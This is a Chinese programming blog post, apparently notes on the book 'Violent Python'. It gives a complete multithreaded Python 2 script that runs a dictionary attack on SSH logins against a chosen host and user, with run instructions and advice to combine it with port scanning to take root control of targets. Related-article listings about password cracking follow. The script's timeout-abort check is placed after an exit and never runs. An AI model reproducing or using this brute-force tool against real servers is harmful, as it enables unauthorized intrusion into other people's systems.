【python】ssh密码字典攻击

最新推荐文章于 2024-07-27 15:37:47 发布
最新推荐文章于 2024-07-27 15:37:47 发布
阅读量5.3k 收藏 10
点赞数 1
分类专栏: python 文章标签: python ssh 暴力破解 字典攻击
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/liyihao17/article/details/81177880
版权

学习《Python绝技——运用Python成为顶级黑客》的第二课

如何对ssh进行破解

ssh类似Windows下的telnet功能,如果服务器开启了ssh服务且允许使用密码登录,那么黑客就能够通过暴力破解或者字典攻击来获取目标的ssh密码,从而实现对目标主机的控制。

先把完整代码贴上来:

# -- coding: utf-8 --
#对目标IP地址进行ssh暴力破解
#输入方式:python ssh_cracker.py -H 127.0.0.1 -u root -F diction.txt
from pexpect import pxssh
import optparse
import time
from threading import *
maxConnections=5
connection_lock=BoundedSemaphore(value=maxConnections)
Found=False
Fails=0
def connect(host,user,password,release):
	global Found
	global Fails
	try:
		s=pxssh.pxssh()
		s.login(host,user,password)
		print '[+]Password Found:'+password
		Found=True
	except Exception,e:
		if 'read_nonblocking' in str(e):
			Fails+=1
			time.sleep(5)
			connect(host,user,password,False)
		elif 'synchronize with original prompt' in str(e):
			time.sleep(1)
			connect(host,user,password,False)
	finally:
		if release:
			connection_lock.release()
def main():
	parser=optparse.OptionParser('usage %prog -H <target host> -u <user> -F <password list>')
	parser.add_option('-H',dest='tgtHost',type='string',help='specify the target host')
	parser.add_option('-u',dest='user',type='string',help='specify the user')
	parser.add_option('-F',dest='passwords',type='string',help='specify the password file')
	(options, args)=parser.parse_args()
	host=options.tgtHost
	user=options.user
	passwords=options.passwords
	if host==None or user==None or passwords==None:
		print parser.usage
		exit(0)
	fn=open(passwords,'r')
	for line in fn.readlines():
		if Found:
			print '[*]Exiting: Password Found'
			exit(0)
			if Fails>5:
				print '[!]Exiting:Too many Socket Timeouts'
				exit(0)
		connection_lock.acquire()
		psw=line.strip('\r').strip('\n')
		print "[-] Testing :" +str(psw)
		t=Thread(target=connect, args=(host,user,psw,True))
		t.start()
if __name__=='__main__':
	main()

当然,在写代码之前必须先安装上pexpect这个库,使用debian类linux系统可以使用apt来获取相应的库,比较轻松简单。

该库中提供一个能够使用ssh登录的封装,使用该库只要提供主机、用户名、密码参数即可实现,所以该程序通过不断地加载字典中的每一行当做是密码,从而对root用户的密码进行破解,如果登录成功则会返回登陆成功信息,如果登录失败(提示超时则重复尝试登录5次,提示密码错误则进行下一组密码破解)

另外此程序中使用了线程,处理速度大大加快。

建议端口扫描和该程序配合使用。

使用端口扫描程序获取目标网域的端口开放信息(ssh服务的默认端口号为22),如果目标网域的22号端口开放,并且返回了相应的ssh服务版本号等信息,基本就可以确定该目标开启了ssh服务,然后使用该程序对ssh服务进行密码破解,成功使用root用户登录。

当然现在网络上的许多机器即使开启了ssh服务也不一定会允许root用户登录,有的甚至不允许密码登录,很多是使用密钥免密码登录,对于这种机器,还得另想法子。——比如。。。弱密钥。

uruz_L
关注
专栏目录
Python —— 字典攻击
Cwx699699的博客
12-22 347
字典攻击1.0 import itertools import datetime import hashlib import time def generatelibarry(library, length=8): libararys = itertools.product(library,repeat=length) dic = open(“paswordlirbarys.txt”,“w”,encoding=‘utf-8’) for i in libararys: dic.writelines(i) di
python字典攻击
Quexu的博客
01-08 394
字典攻击 import itertools # 迭代器 import datetime import hashlib import time def generatelibary(library, length=8): libararys = itertools.product(library,repeat=length) dic = open(“paswordlirbarys.txt”,“w”,encoding=‘utf-8’)#写模式打开文件 for i in libararys: dic.writel
word源码java-dictionary-attack:一个用Java编码的字典攻击的简单例子
06-05
word源码java 字典攻击 该存储库包含一个用 Java 编码的字典攻击的简单示例。 存储库内容描述 以下是您可以在此存储库中找到的文件: password.txt包含我们使用攻击恢复的密码列表 DictionaryAttack.java是攻击的源代码 english.0是攻击期间用来恢复密码的字典 password.txt文件格式说明 我们使用攻击恢复的密码列表是一个文本文件,其中每一行都包含一个用户帐户名,后跟一个密码。 有两种可能的行格式:第一种包含未加盐的密码,而第二种包含加盐的密码和盐。 username 0 unsaltedpassword username 1 salt saltedpassword 密码使用 SHA-1 进行散列(请参阅 Java 加密扩展中的实现攻击源代码)。 使用盐时,它会简单地与密码连接在一起,如下所示: salt || password salt || password 。 攻击描述 该攻击简单地逐行读取字典,并为每行中包含的单词计算 6 个不同的可能散列密码。 将这 6 个可能的哈希值与password.txt文件中包含的每个密码进行比较以
kali之ssh超级爆破,字典自动生成。
Afghanis的博客
05-12 6905
利用kali渗透工具对服务器,个人电脑等进行ssh爆破,ssh默认端口一般是22端口。
记录一次Linux服务器被人使用SSH字典爆破
最新发布
互联网架构小马的博客
07-27 774
2024年1.20凌晨睡了一觉,早上起来用termux远程ssh登录小主机发现密码没法登录了,一直显示密码错误,到了晚上用电脑ssh连接小主机,发现小主机真的没法登录了,直接把小主机接上屏幕查看,发现密码被人修改了,系统都进不去,而且主机风扇一直呼呼转,估计是cpu使用率上来了,这下只能进到linux的安全模式进行密码修改了。挖矿程序一般都设置了定时任务启动脚本程序,查看定时任务,crontab -l查看是找不到的��得看/etc/crontab文件,执行 cat /etc/crontab。
服务器搭建SSH暴力攻击诱饵,制作密码字典
TonyNomoney的博客
10-06 1639
修改openssh的源码, 记录暴力登录字典, 打包成docker镜像
Kali wifi字典 ssh字典 password usernam字典 全部字典
sunwanfulove的博客
09-29 4110
Kali wifi字典 ssh字典 password usernam字典 全部字典
python——字典攻击
qq_52870044的博客
12-31 652
Python-字典攻击实验 1.题目: 字典攻击 2.设计 通过导入itertools(用于操作迭代对象的函数)、datetime、hashlib(哈希函数,通过hash算法,变成固定长度的输出), 通过哈希算法,得到字典中关键的值。 代码部分: import hashlib import time def generatelibary(library, length=8): libararys = itertools.product(library,repeat=length) dic =...
利用python进行ssh密码验证
qq_27168229的博客
06-08 2262
首先准备好环境       1、虚拟机kali Linux、metasploitable2-linux。         pip install pexpect     ---------------------------------------------------------   2、源码   #!/usr/bin/python #coding: utf-8 f...
python字典的常用操作方法小结
12-25
Python字典是另一种可变容器模型(无序),且可存储任意类型对象,如字符串、数字、元组等其他容器模型。本文章主要介绍Python中字典(Dict)的详解操作方法,包含创建、访问、删除、其它操作等,需要的朋友可以参考下。 ...
python远程ssh交互_pythonssh交互
weixin_39630106的博客
12-05 1106
由于pexpect模块在windows上不能运行,官方给出的。所以我使用了paramiko模块进行我们的交互。我的linux是Debian Kali Linux 64位首先我们要进vim的/etc/ssh/sshd_config把#PermitRootLoginwithout-password的#去掉,without-password改为yes把#PasswordAuthentication...
Python编写固定字典爆破
05-19
本主题聚焦于使用Python编程语言实现针对特定服务(如电子邮件、Redis、FTP、SSH和MySQL)的固定字典爆破。这些服务通常都需要用户名和密码进行身份验证,而固定字典爆破是一种尝试匹配预定义密码列表的方法。 首先...
Python自动连接ssh的方法
09-22
之后,定义了一个地址映射字典addr_map,它将简短的标识符映射到相应的SSH连接字符串和密码。这样可以方便地通过标识符来引用特定的服务器地址和凭据。 使用sys.argv[1]获取命令行参数作为key,程序会根据key查找到...
网络安全——SSH密码攻击实验_手动创建用户名字典和密码字典 登录主机1,打开terminal终端,执行命令vi users(1)
erthre的博客
04-16 718
同理,再次提高密码的健壮性,进行第二次破解,可看出,破解失败。1)在Target选项卡下,设置Single Target地址,即攻击目标系统的地址,30.0.1.4(主机2),设置协议为SSH,勾选Output Options框中Show Attempts的复选框,可以查看密码攻击的过程。最近遍览了各种网络安全类的文章,内容参差不齐,其中不伐有大佬倾力教学,也有各种不良机构浑水摸鱼,在收到几条私信,发现大家对一套完整的系统的网络安全从学习路线到学习资料,甚至是工具有着不小的需求。并提供多种登录机制。
网络安全——SSH密码攻击实验_手动创建用户名字典和密码字典 登录主机1,打开terminal终端,执行命令vi users
zhuceyigecsdn的博客
04-09 1038
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!
密码破解!字典攻击(C/C++代码实现)
chen1415886044的博客
08-13 3225
字典攻击是一种通过系统地将字典中的每个单词作为密码输入,从而侵入受密码保护的计算机、网络或其他IT资源的方法。字典攻击也可以用于查找解密加密消息或文档所需的密钥。 字典攻击之所以有效,是因为许多计算机用户和企业坚持使用普通单词作为密码。这些攻击通常针对使用多字密码的系统不成功,也经常针对由大小写字母和随机组合的数字组成的密码不成功。 在密码要求很高的系统中,暴力攻击方法有时是有效的,在这种方法中,字符和空格的每一个可能组合都要测试到一定的最大长度。然而,暴力攻击可能需要很长时间才能产生结果。
服务器SSH被字典爆破时记录密码
辰流的博客
11-11 1900
服务器SSH被字典爆破时记录对方使用的密码 事情的起因是这样的:本人购(bai)买(piao)了一台华为云的云主机,有一天登录的时候日常查看安全日志,发现有人在用字典爆破我ssh登录的用户名和密码,奈何我早就做了安全加固(更改ssh端口、禁止root用户登录、使用fail2ban)对方并没有成功。由于我端口选的过于随机,用户名足够偏,密码强度足够,便放任他爆破。过了一个月发现还在继续,感叹对方执着的同时突然想到:这不正是一个构建自己密码字典的好机会吗?瞬间感觉自己错过了一个亿…迄今为止对方可是已经尝试了四十
Python学习-字典攻击
L_2376131723的博客
01-08 359
1.导入函数库 import hashlib import itertools#迭代器 import datetime import time 2.加密数据 hashlib库提供了很多加密算法,我这里要用的是hashlib.mad5()加密算法来进行加密。 x = hashlib.md5("200112".encode(encoding="utf-8")).hexdigest() print(x) 加密结果如下: ...
SSH密码暴力破解
Marsper的博客
11-16 3697
SSH密码暴力破解 海德拉( Hydra ):希腊神话中的九头蛇,是西方的神话生物,在古希暗神话中出现最为频繁。传说它拥有九颗头,其中一颗头要是被斩断,立刻又会生出两颗头来。 hydra 是世界顶级密码暴力密码破解工具,支持几乎所有协议的在线密码破解,功能强大,其密码能否被破解关键取决于破解字典是否足够强大,在网络安全渗透过程中是一款必备的测试工具。 1.1指定用户破解 打开kali虚拟机 输入hydra -h 查看帮助 Examples: hydra -l user -P passlist.txt ftp
Python ssh 爆破脚本
05-29
Python ssh爆破脚本是一种用Python语言编写的程序,其主要作用是在未授权访问的情况下,尝试猜解SSH服务器的用户名和密码,以获取服务器权限。SSH爆破脚本可以使用多种方法进行用户名和密码的猜测,包括但不限于字典...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值